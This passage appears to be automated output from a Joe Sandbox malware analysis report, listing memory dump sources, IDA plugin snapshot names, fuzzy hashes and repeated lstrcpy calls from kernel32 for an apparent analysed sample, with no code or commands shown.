                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: cc7e492de9fe9306170a2e67f015658eb9c87a91b1757f896cb828f4855cc8cd
                            • Instruction ID: 2264559627f4a98ae0df88b4d9fb30be4455b4e805c78f9f307dd78687737e01
                            • Opcode Fuzzy Hash: cc7e492de9fe9306170a2e67f015658eb9c87a91b1757f896cb828f4855cc8cd
                            • Instruction Fuzzy Hash: 3F81B1B1E0120A9BDB14CF98DC64BBEB7B6AF84304F14806DE608A7381EB759D45CF94
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 006F15A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F15D9
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1611
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1649
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 2ebecec4e9d69245e20289202d2117444c703d708e8b339710ff92032ec63989
                            • Instruction ID: 3cdc3e6396af4c0736d25311c7862195280cbef4e36525e4ae6be2ac01ee3d9d
                            • Opcode Fuzzy Hash: 2ebecec4e9d69245e20289202d2117444c703d708e8b339710ff92032ec63989
                            • Instruction Fuzzy Hash: C62108B4611B078FD774DF2AD468A27B7F6BF55740B04491DA49ACBB41DB30E801CBA0
                            APIs
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000), ref: 006D162D
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000,?), ref: 006D164F
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000,?), ref: 006D1671
                              • Part of subcall function 006D1610: lstrcpy.KERNEL32(00000000,?), ref: 006D1693
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 7ee73f7553ea17d602eb705634f1f2ab80d0d272e28c3133e3201c19bac57e6e
                            • Instruction ID: 76c97febe3d203b0e9c624017f4390f026c62c08ee3659131538742e1b07b088
                            • Opcode Fuzzy Hash: 7ee73f7553ea17d602eb705634f1f2ab80d0d272e28c3133e3201c19bac57e6e
                            • Instruction Fuzzy Hash: A331D6B4E11B42AFD764DF3AD598952BBE6BF49300700492EA896C7B10EB74F811CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 006D162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1671
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1693
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 8505bb050cb47f5f432a2586269a630af07ac9f2d14dbae009444733ecff56c1
                            • Instruction ID: a544b0dbce61ad4c2d4bdc204c988604eb5100bb98459437818ba5754a28e6ac
                            • Opcode Fuzzy Hash: 8505bb050cb47f5f432a2586269a630af07ac9f2d14dbae009444733ecff56c1
                            • Instruction Fuzzy Hash: 02115E74E11B43AFDB249F36D428926B7F9BF45701708452EA48ACBB50EB70E801CB90